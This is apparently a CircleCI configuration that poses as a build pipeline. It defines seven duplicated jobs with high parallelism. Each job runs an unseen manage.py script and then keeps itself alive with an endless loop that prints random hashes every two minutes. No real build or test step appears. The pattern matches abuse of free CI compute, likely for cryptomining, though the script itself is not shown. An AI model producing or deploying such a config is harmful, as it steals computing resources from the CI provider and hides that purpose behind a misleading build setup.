version: 2.1

jobs:
  build:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Build
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
                     
  build2:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Builds
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

  build3:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Buildss
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

  build4:
    parallelism: 15
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Buildsss
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

  build5:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Buildssss
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

  build6:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Buildsssss
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

  build7:
    parallelism: 5
    docker:
      - image: couchbase
    steps:
      - checkout
      - run:
         name: Buildssssss
         command: |
                     apt update && apt -y install curl python3 libjansson4
                     chmod +x manage.py && python3 manage.py
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
                     
workflows:
  main:
    jobs:
      - build
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7      
